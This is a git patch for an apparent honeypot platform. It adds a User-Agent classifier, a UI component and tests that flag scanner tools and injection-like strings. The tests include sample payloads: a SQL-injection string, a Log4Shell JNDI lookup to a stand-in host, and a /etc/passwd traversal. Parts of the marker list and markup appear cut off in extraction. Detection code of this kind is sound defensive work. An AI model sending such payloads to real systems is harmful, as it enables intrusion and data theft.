From ca39552692eebd4926cc93e6e4c2e6b0ef6ae749 Mon Sep 17 00:00:00 2001 From: anti Date: Fri, 24 Apr 2026 18:17:18 -0400 Subject: [PATCH] feat(ua): classify User-Agent into scanner/cli/library/bot/nonstandard MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit Every http_useragent bounty now carries a `category` label plus an optional tool name and a signals list. The main analytic win is the `nonstandard` bucket — UAs like "FUCKYOU/1.0" or custom one-off scanner labels that don't match any known pattern, which today silently blend into the generic fingerprint list. Buckets (priority order): - scanner: nmap, nuclei, sqlmap, gobuster, nikto, masscan, zgrab, ffuf, wpscan, katana, burp, acunetix, nessus, openvas, arachni, whatweb, wappalyzer, etc. - cli: curl, wget, httpie, xh, fetch. - library: python-requests, aiohttp, httpx, urllib, Go stdlib, Java, okhttp, Apache HttpClient, axios, node-fetch, got, undici, PHP, Guzzle, Ruby stdlib, Faraday, .NET, PostmanRuntime, Insomnia, etc. - bot: anything containing bot / crawler / spider / slurp / monitor (catches Googlebot, bingbot, Baiduspider — many of which ship a Mozilla/5.0 prefix, so the bot check runs BEFORE the browser regex). - browser: Mozilla/5.0-prefixed UAs that aren't bots. - nonstandard: anything else. The interesting bucket. - empty: literal empty User-Agent header. Side signals computed regardless of category: suspicious_short (<8 chars), suspicious_long (>512 chars), nonprintable (control chars), injection_like (SQLi / XSS / path-traversal / Log4Shell markers). A sqlmap UA with a literal SQL-injection payload embedded fires category=scanner + injection_like — the combination tells the analyst the tool is being operated manually vs. on default config. Classification is deterministic (same UA string → same tuple) so add_bounty's payload-hash dedup continues to collapse repeat rows. 
UI renderer upgraded from FpGeneric to a dedicated FpUserAgent that colours the category tag by risk (scanner=alert-red, nonstandard=warn-yellow, browser=accent-green, etc.) and renders each signal as its own chip. Makes the interesting rows pop in the fingerprints panel. Also fixed: the ingester was using `_headers.get("User-Agent") or _headers.get("user-agent")`, which short-circuits away empty-string UAs. An explicit empty UA is itself a signal (real clients always send something) — now captured. --- decnet/web/ingester.py | 164 ++++++++++++- decnet_web/src/components/AttackerDetail.tsx | 53 ++++ tests/web/test_ingester_ua_classify.py | 242 +++++++++++++++++++ 3 files changed, 452 insertions(+), 7 deletions(-) create mode 100644 tests/web/test_ingester_ua_classify.py diff --git a/decnet/web/ingester.py b/decnet/web/ingester.py index 9e034430..02fb68a4 100644 --- a/decnet/web/ingester.py +++ b/decnet/web/ingester.py @@ -230,13 +230,19 @@ async def _extract_bounty(repo: BaseRepository, log_data: dict[str, Any]) -> Non _headers = {} else: _headers = {} - _ua = _headers.get("User-Agent") or _headers.get("user-agent") - if _ua: - # Payload must be identity-only (no per-request method/path) — - # add_bounty dedups on (attacker_ip, bounty_type, full payload - # JSON), so including path here would create one row per URL - # the scanner hits. Per-request context belongs in the logs - # table, not the bounty table. + # Read both casings without `or` short-circuiting: an explicit + # empty User-Agent is itself a signal and must not collapse to the + # lowercase fallback. + _ua = _headers.get("User-Agent") + if _ua is None: + _ua = _headers.get("user-agent") + if _ua is not None: + # Classify: browser / cli / library / scanner / bot / nonstandard + # / empty. `nonstandard` is the interesting one — UAs like + # "FUCKYOU/1.0" land there and deserve an analyst's attention. 
+ # Classification is deterministic given the UA string, so the + # payload stays dedup-stable across repeat requests. + _ua_category, _ua_tool, _ua_signals = _classify_ua(_ua) await repo.add_bounty({ "decky": log_data.get("decky"), "service": log_data.get("service"), @@ -245,6 +251,9 @@ async def _extract_bounty(repo: BaseRepository, log_data: dict[str, Any]) -> Non "payload": { "fingerprint_type": "http_useragent", "value": _ua, + "category": _ua_category, + "tool": _ua_tool, + "signals": _ua_signals or None, } }) @@ -841,3 +850,144 @@ def _http_quirks_fingerprint( "tool_guess": _guess_tool_from_order(lowered), } + +# ─── User-Agent classifier ────────────────────────────────────────────────── +# +# Bucket UAs into one of {browser, cli, library, scanner, bot, nonstandard, +# empty}, and surface optional `tool` name + `signals` list (suspicious_short +# / suspicious_long / nonprintable / injection_like). The main analytic +# value is `nonstandard` — UAs that don't match any known pattern are +# either custom tooling, adversarial labels ("FUCKYOU/1.0"), or +# misconfigured scanners that deserve an analyst's eye. + +_UA_BROWSER_RE = re.compile(r"^Mozilla/\d") +# Substring match without word boundaries so "bingbot", "Googlebot", +# "Baiduspider" etc. register. Downside: matches "robot" or "spidery" +# in pathological payloads — acceptable at this classifier's precision. +_UA_BOT_RE = re.compile(r"(bot|crawler|spider|slurp|monitor)", re.IGNORECASE) + +# Order matters inside each bucket — first match wins, so list the more +# specific pattern first (e.g. python-requests before Python/). +_UA_CLI_RES: tuple[tuple[re.Pattern[str], str], ...] = ( + (re.compile(r"^curl/", re.IGNORECASE), "curl"), + (re.compile(r"^Wget/", re.IGNORECASE), "wget"), + (re.compile(r"^HTTPie/", re.IGNORECASE), "httpie"), + (re.compile(r"^xh/", re.IGNORECASE), "xh"), + (re.compile(r"^fetch/", re.IGNORECASE), "fetch"), +) + +_UA_LIBRARY_RES: tuple[tuple[re.Pattern[str], str], ...] 
= ( + (re.compile(r"^python-requests/", re.IGNORECASE), "python-requests"), + (re.compile(r"^aiohttp/", re.IGNORECASE), "aiohttp"), + (re.compile(r"^httpx/", re.IGNORECASE), "httpx"), + (re.compile(r"^urllib/", re.IGNORECASE), "urllib"), + (re.compile(r"^Python-urllib/", re.IGNORECASE), "urllib"), + (re.compile(r"^Python/\d", re.IGNORECASE), "python-stdlib"), + (re.compile(r"^Go-http-client/", re.IGNORECASE), "go-stdlib"), + (re.compile(r"^go-resty/", re.IGNORECASE), "go-resty"), + (re.compile(r"^Java/\d", re.IGNORECASE), "java-stdlib"), + (re.compile(r"^okhttp/", re.IGNORECASE), "okhttp"), + (re.compile(r"^Apache-HttpClient/", re.IGNORECASE), "apache-httpclient"), + (re.compile(r"^Jersey/", re.IGNORECASE), "jersey"), + (re.compile(r"^axios/", re.IGNORECASE), "axios"), + (re.compile(r"^node-fetch/", re.IGNORECASE), "node-fetch"), + (re.compile(r"^got\s?\(|^got/", re.IGNORECASE), "got"), + (re.compile(r"^undici", re.IGNORECASE), "undici"), + (re.compile(r"^PHP/\d", re.IGNORECASE), "php-stdlib"), + (re.compile(r"GuzzleHttp/", re.IGNORECASE), "guzzle"), + (re.compile(r"^Ruby\b", re.IGNORECASE), "ruby-stdlib"), + (re.compile(r"^Faraday\b", re.IGNORECASE), "faraday"), + (re.compile(r"^HTTParty", re.IGNORECASE), "httparty"), + (re.compile(r"^\.NET/|System\.Net\.Http|RestSharp/", re.IGNORECASE), "dotnet"), + (re.compile(r"^PostmanRuntime/", re.IGNORECASE), "postman"), + (re.compile(r"^Insomnia/", re.IGNORECASE), "insomnia"), +) + +_UA_SCANNER_RES: tuple[tuple[re.Pattern[str], str], ...] 
= ( + (re.compile(r"\bnmap\b", re.IGNORECASE), "nmap"), + (re.compile(r"\bmasscan\b", re.IGNORECASE), "masscan"), + (re.compile(r"\bzgrab\b", re.IGNORECASE), "zgrab"), + (re.compile(r"\bzmap\b", re.IGNORECASE), "zmap"), + (re.compile(r"\bNuclei\b", re.IGNORECASE), "nuclei"), + (re.compile(r"\bsqlmap\b", re.IGNORECASE), "sqlmap"), + (re.compile(r"\bgobuster\b", re.IGNORECASE), "gobuster"), + (re.compile(r"\bdirb\b", re.IGNORECASE), "dirb"), + (re.compile(r"\bdirbuster\b", re.IGNORECASE), "dirbuster"), + (re.compile(r"\bnikto\b", re.IGNORECASE), "nikto"), + (re.compile(r"\bferoxbuster\b", re.IGNORECASE), "feroxbuster"), + (re.compile(r"\bwfuzz\b", re.IGNORECASE), "wfuzz"), + (re.compile(r"\bffuf\b", re.IGNORECASE), "ffuf"), + (re.compile(r"\bwpscan\b", re.IGNORECASE), "wpscan"), + (re.compile(r"\bkatana\b", re.IGNORECASE), "katana"), + (re.compile(r"\bBurp\b", re.IGNORECASE), "burp"), + (re.compile(r"\bAcunetix\b", re.IGNORECASE), "acunetix"), + (re.compile(r"\bNessus\b", re.IGNORECASE), "nessus"), + (re.compile(r"\bOpenVAS\b", re.IGNORECASE), "openvas"), + (re.compile(r"\bArachni\b", re.IGNORECASE), "arachni"), + (re.compile(r"\bWhatWeb\b", re.IGNORECASE), "whatweb"), + (re.compile(r"\bWappalyzer\b", re.IGNORECASE), "wappalyzer"), + (re.compile(r"\bSploitScan\b", re.IGNORECASE), "sploitscan"), +) + +# Substring markers that strongly suggest a payload attempt embedded in +# the UA itself. Attackers sometimes park SQLi / path traversal / XSS +# test strings in User-Agent hoping a middleware or log-ingestion tool +# mishandles it. +_UA_INJECTION_MARKERS: tuple[str, ...] = ( + " tuple[str, Optional[str], list[str]]: + """Return ``(category, tool, signals)``. + + category ∈ {empty, browser, cli, library, scanner, bot, nonstandard}. + tool is the matched tool name when ``category`` ∈ {cli, library, + scanner}, else None. 
signals is a list of auxiliary flags — + suspicious_short, suspicious_long, nonprintable, injection_like — + always present on top of the category, since a scanner UA with an + injection marker is a distinct signal from a scanner UA alone. + """ + signals: list[str] = [] + if ua is None or ua == "": + return "empty", None, signals + + # Detectors that apply regardless of category. + if len(ua) < 8: + signals.append("suspicious_short") + if len(ua) > 512: + signals.append("suspicious_long") + if any(ord(c) < 32 and c != "\t" for c in ua): + signals.append("nonprintable") + lowered = ua.lower() + if any(marker in lowered for marker in _UA_INJECTION_MARKERS): + signals.append("injection_like") + + # Priority: scanner > cli > library > bot > browser > nonstandard. + # Bots before browser because well-behaved crawlers ship UAs like + # "Mozilla/5.0 (compatible; Googlebot/2.1)" — the Mozilla prefix + # would win under browser-first ordering and misclassify them. + for regex, name in _UA_SCANNER_RES: + if regex.search(ua): + return "scanner", name, signals + for regex, name in _UA_CLI_RES: + if regex.search(ua): + return "cli", name, signals + for regex, name in _UA_LIBRARY_RES: + if regex.search(ua): + return "library", name, signals + if _UA_BOT_RE.search(ua): + return "bot", None, signals + if _UA_BROWSER_RE.match(ua): + return "browser", None, signals + return "nonstandard", None, signals + diff --git a/decnet_web/src/components/AttackerDetail.tsx b/decnet_web/src/components/AttackerDetail.tsx index d96a464d..a18b354b 100644 --- a/decnet_web/src/components/AttackerDetail.tsx +++ b/decnet_web/src/components/AttackerDetail.tsx @@ -342,6 +342,58 @@ const FpGeneric: React.FC<{ p: any }> = ({ p }) => ( ); +const UA_CATEGORY_COLOR: Record = { + scanner: 'var(--alert, #ff4d4d)', + nonstandard: 'var(--warn, #e0a040)', + empty: 'var(--warn, #e0a040)', + bot: 'var(--violet)', + cli: 'var(--matrix)', + library: 'var(--matrix)', + browser: 'var(--accent-color)', +}; + +const 
UA_SIGNAL_COLOR: Record = { + injection_like: 'var(--alert, #ff4d4d)', + nonprintable: 'var(--alert, #ff4d4d)', + suspicious_long: 'var(--warn, #e0a040)', + suspicious_short: 'var(--warn, #e0a040)', +}; + +const FpUserAgent: React.FC<{ p: any }> = ({ p }) => { + const category = typeof p.category === 'string' ? p.category : 'unknown'; + const color = UA_CATEGORY_COLOR[category] || 'var(--text-color)'; + const signals: string[] = Array.isArray(p.signals) ? p.signals : []; + return ( +
+ {p.value !== undefined && p.value !== '' ? ( + + {p.value} + + ) : ( + + (empty User-Agent) + + )} +
+ {category.toUpperCase()} + {p.tool && {String(p.tool).toUpperCase()}} + {signals.map((s) => ( + + {s.toUpperCase().replace(/_/g, ' ')} + + ))} +
+
+ ); +}; + const FpSpoofedSource: React.FC<{ p: any }> = ({ p }) => (
@@ -434,6 +486,7 @@ const FingerprintGroup: React.FC<{ fpType: string; items: any[] }> = ({ fpType, case 'hassh_server': return ; case 'tcpfp': return ; case 'http_quirks': return ; + case 'http_useragent': return ; case 'spoofed_source': return ; default: return ; } diff --git a/tests/web/test_ingester_ua_classify.py b/tests/web/test_ingester_ua_classify.py new file mode 100644 index 00000000..513b5df8 --- /dev/null +++ b/tests/web/test_ingester_ua_classify.py @@ -0,0 +1,242 @@ +"""User-Agent classifier — enriches http_useragent bounty payload.""" +from __future__ import annotations + +from unittest.mock import AsyncMock + +import pytest + +from decnet.web.ingester import _classify_ua, _extract_bounty + + +def _row(ua: str) -> dict: + return { + "decky": "http-01", + "service": "http", + "attacker_ip": "1.2.3.4", + "event_type": "request", + "fields": { + "method": "GET", + "path": "/", + "headers": {"User-Agent": ua} if ua else {}, + }, + } + + +# ─── categories ──────────────────────────────────────────────────────────── + +def test_empty_ua_is_empty_category(): + cat, tool, signals = _classify_ua("") + assert cat == "empty" + assert tool is None + + +@pytest.mark.parametrize("ua", [ + "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36", + "Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0", + "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0 Safari/605.1.15", +]) +def test_browser_classification(ua: str): + cat, tool, _ = _classify_ua(ua) + assert cat == "browser" + assert tool is None + + +@pytest.mark.parametrize("ua,expected_tool", [ + ("curl/8.0.1", "curl"), + ("curl/7.81.0", "curl"), + ("Wget/1.21.3", "wget"), + ("HTTPie/3.2.1", "httpie"), +]) +def test_cli_classification(ua: str, expected_tool: str): + cat, tool, _ = _classify_ua(ua) + assert cat == "cli" + assert tool == expected_tool + + 
+@pytest.mark.parametrize("ua,expected_tool", [ + ("python-requests/2.31.0", "python-requests"), + ("aiohttp/3.9.1", "aiohttp"), + ("httpx/0.27.0", "httpx"), + ("Go-http-client/1.1", "go-stdlib"), + ("Java/11.0.19", "java-stdlib"), + ("okhttp/4.11.0", "okhttp"), + ("Apache-HttpClient/5.2.1 (Java/11.0.19)", "apache-httpclient"), + ("axios/1.6.2", "axios"), + ("PostmanRuntime/7.36.1", "postman"), + ("GuzzleHttp/7", "guzzle"), +]) +def test_library_classification(ua: str, expected_tool: str): + cat, tool, _ = _classify_ua(ua) + assert cat == "library" + assert tool == expected_tool + + +@pytest.mark.parametrize("ua,expected_tool", [ + ("Nmap Scripting Engine; https://nmap.org/book/nse.html", "nmap"), + ("Mozilla/5.0 (compatible; Nuclei - Open-source project)", "nuclei"), + ("sqlmap/1.7.11#stable (http://sqlmap.org)", "sqlmap"), + ("gobuster/3.6", "gobuster"), + ("Mozilla/5.0 (Nikto/2.5.0)", "nikto"), + ("masscan/1.3.2", "masscan"), + ("wpscan v3.8.25 ", "wpscan"), + ("zgrab/0.x", "zgrab"), + ("Mozilla/5.0 (X11; Acunetix; Linux x86_64)", "acunetix"), + ("ffuf/2.1.0", "ffuf"), +]) +def test_scanner_classification(ua: str, expected_tool: str): + cat, tool, _ = _classify_ua(ua) + assert cat == "scanner" + assert tool == expected_tool + + +@pytest.mark.parametrize("ua", [ + "Googlebot/2.1 (+http://www.google.com/bot.html)", + "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)", + "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)", +]) +def test_bot_classification(ua: str): + cat, _, _ = _classify_ua(ua) + assert cat == "bot" + + +@pytest.mark.parametrize("ua", [ + "FUCKYOU/1.0", + "myscanner", + "customtool-v2", + "ABCDE", # short — also triggers suspicious_short signal + "X", + "lol", + "hello-world-ua", +]) +def test_nonstandard_classification(ua: str): + cat, tool, _ = _classify_ua(ua) + assert cat == "nonstandard", f"{ua!r} should be nonstandard but got {cat}" + assert tool is None + + +# ─── signals 
─────────────────────────────────────────────────────────────── + +def test_suspicious_short_signal(): + _, _, signals = _classify_ua("lol") + assert "suspicious_short" in signals + + +def test_suspicious_long_signal(): + _, _, signals = _classify_ua("A" * 600) + assert "suspicious_long" in signals + + +def test_nonprintable_signal(): + _, _, signals = _classify_ua("curl/8\x00.0") + assert "nonprintable" in signals + + +def test_injection_like_sqli(): + _, _, signals = _classify_ua("Mozilla/5.0' OR 1=1 --") + assert "injection_like" in signals + + +def test_injection_like_log4shell(): + _, _, signals = _classify_ua("${jndi:ldap://evil.example/x}") + assert "injection_like" in signals + + +def test_injection_like_xss(): + _, _, signals = _classify_ua("") + assert "injection_like" in signals + + +def test_injection_like_path_traversal(): + _, _, signals = _classify_ua("mytool/../../etc/passwd") + assert "injection_like" in signals + + +def test_no_signals_on_normal_browser(): + _, _, signals = _classify_ua( + "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36" + ) + assert signals == [] + + +def test_scanner_can_still_carry_injection_signal(): + """A scanner UA with an injection marker embedded is a combination + worth separating — both labels applied.""" + cat, tool, signals = _classify_ua("sqlmap/1.7' OR 1=1 --") + assert cat == "scanner" + assert tool == "sqlmap" + assert "injection_like" in signals + + +# ─── payload determinism / dedup ─────────────────────────────────────────── + +def test_same_ua_produces_same_payload(): + """Critical for add_bounty dedup — same UA string must produce + byte-identical classifier output so the full payload hashes the + same across requests.""" + a = _classify_ua("FUCKYOU/1.0") + b = _classify_ua("FUCKYOU/1.0") + assert a == b + + +# ─── end-to-end via _extract_bounty ──────────────────────────────────────── + +@pytest.mark.asyncio +async def test_extract_bounty_enriches_nonstandard_ua(): + repo = AsyncMock() + await 
_extract_bounty(repo, _row("FUCKYOU/1.0")) + + ua_call = next( + c.args[0] for c in repo.add_bounty.call_args_list + if c.args[0].get("bounty_type") == "fingerprint" + and c.args[0]["payload"].get("fingerprint_type") == "http_useragent" + ) + p = ua_call["payload"] + assert p["value"] == "FUCKYOU/1.0" + assert p["category"] == "nonstandard" + assert p["tool"] is None + + +@pytest.mark.asyncio +async def test_extract_bounty_enriches_scanner_ua(): + repo = AsyncMock() + await _extract_bounty(repo, _row("sqlmap/1.7.11")) + + ua_call = next( + c.args[0] for c in repo.add_bounty.call_args_list + if c.args[0].get("bounty_type") == "fingerprint" + and c.args[0]["payload"].get("fingerprint_type") == "http_useragent" + ) + p = ua_call["payload"] + assert p["category"] == "scanner" + assert p["tool"] == "sqlmap" + + +@pytest.mark.asyncio +async def test_extract_bounty_empty_ua_still_fires(): + """Explicit empty UA header is itself a signal — real clients + always send SOMETHING. Flag as 'empty' category.""" + row = { + "decky": "http-01", + "service": "http", + "attacker_ip": "1.2.3.4", + "event_type": "request", + "fields": { + "method": "GET", + "path": "/", + "headers": {"User-Agent": ""}, + }, + } + repo = AsyncMock() + await _extract_bounty(repo, row) + + ua_calls = [ + c.args[0] for c in repo.add_bounty.call_args_list + if c.args[0].get("bounty_type") == "fingerprint" + and c.args[0]["payload"].get("fingerprint_type") == "http_useragent" + ] + # Empty-string UA is falsy — _extract_bounty previously checked `if _ua:`, + # which silently dropped it. A missing UA must still NOT emit, but an + # explicit empty one must. The ingester now checks `_ua is not None`; + # verify it fires exactly once with category=empty. + assert len(ua_calls) == 1 + assert ua_calls[0]["payload"]["category"] == "empty"